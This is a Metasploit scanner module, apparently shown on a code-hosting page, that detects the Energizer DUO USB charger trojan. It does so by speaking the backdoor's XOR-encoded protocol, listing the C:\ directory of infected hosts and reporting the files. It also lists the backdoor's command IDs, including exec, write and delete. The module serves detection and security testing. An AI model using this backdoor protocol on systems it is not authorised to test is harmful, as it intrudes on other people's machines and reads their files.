Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::Tcp
8
  include Msf::Auxiliary::Scanner
9
  include Msf::Auxiliary::Report
10

11
  def initialize
12
    super(
13
      'Name'        => 'Energizer DUO Trojan Scanner',
14
      'Description' => 'Detect instances of the Energizer DUO trojan horse software on port 7777',
15
      'Author'      => 'hdm',
16
      'References'  =>
17
        [
18
          ['CVE', '2010-0103'],
19
          ['OSVDB', '62782'],
20
          ['US-CERT-VU', '154421']
21
        ],
22
      'License'     => MSF_LICENSE
23
    )
24

25
    register_options(
26
      [
27
        Opt::RPORT(7777),
28
      ])
29
  end
30

31
  def trojan_encode(str)
32
    str.unpack("C*").map{|c| c ^ 0xE5}.pack("C*")
33
  end
34

35
  def trojan_command(cmd)
36
    cid = ""
37

38
    case cmd
39
    when :exec
40
      cid = "{8AF1C164-EBD6-4b2b-BC1F-64674E98A710}"
41
    when :dir
42
      cid = "{0174D2FC-7CB6-4a22-87C7-7BB72A32F19F}"
43
    when :write
44
      cid = "{98D958FC-D0A2-4f1c-B841-232AB357E7C8}"
45
    when :read
46
      cid = "{F6C43E1A-1551-4000-A483-C361969AEC41}"
47
    when :nop
48
      cid = "{783EACBF-EF8B-498e-A059-F0B5BD12641E}"
49
    when :find
50
      cid = "{EA7A2EB7-1E49-4d5f-B4D8-D6645B7440E3}"
51
    when :yes
52
      cid = "{E2AC5089-3820-43fe-8A4D-A7028FAD8C28}"
53
    when :runonce
54
      cid = "{384EBE2C-F9EA-4f6b-94EF-C9D2DA58FD13}"
55
    when :delete
56
      cid = "{4F4F0D88-E715-4b1f-B311-61E530C2C8FC}"
57
    end
58

59
    trojan_encode(
60
      [0x27].pack("V") + cid  + "\x00"
61
    )
62
  end
63

64
  def run_host(ip)
65

66
    begin
67

68
    connect
69
    sock.put(trojan_command(:dir))
70
    sock.put(
71
      trojan_encode(
72
        [4].pack("V") + "C:\\\x00\x00"
73
      )
74
    )
75

76
    lbuff = sock.get_once(4, 5)
77
    if(not lbuff)
78
      print_error("#{ip}:#{rport} UNKNOWN: No response to the directory listing request")
79
      disconnect
80
      return
81
    end
82

83
    len   = trojan_encode(lbuff).unpack("V")[0]
84
    dbuff = sock.get_once(len, 30)
85
    data  = trojan_encode(dbuff)
86
    files = data.split("|").map do |x|
87
      if x[0,2] == "?1"
88
        ["D", x[2,x.length-2]]
89
      else
90
        ["F", x]
91
      end
92
    end
93

94
    # Required to prevent the server from spinning a loop
95
    sock.put(trojan_command(:nop))
96

97
    print_good("#{ip}:#{rport} FOUND: #{files.inspect}")
98
    # Add Vulnerability and Report
99
    report_vuln({
100
      :host  => ip,
101
      :name  => "Energizer DUO USB Battery Charger Software Arucer.dll Trojaned Distribution",
102
      :refs  => self.references
103
    })
104
    report_note(
105
      :host   => ip,
106
      :proto  => 'tcp',
107
      :port   => datastore['RPORT'],
108
      :sname  => "energizer_duo",
109
      :type   => 'Energizer DUO Trojan',
110
      :data   => files.inspect
111
    )
112
    disconnect
113

114
    rescue ::Interrupt
115
      raise $!
116
    rescue ::Rex::ConnectionError, ::IOError
117
    end
118

119
  end
120
end
121

122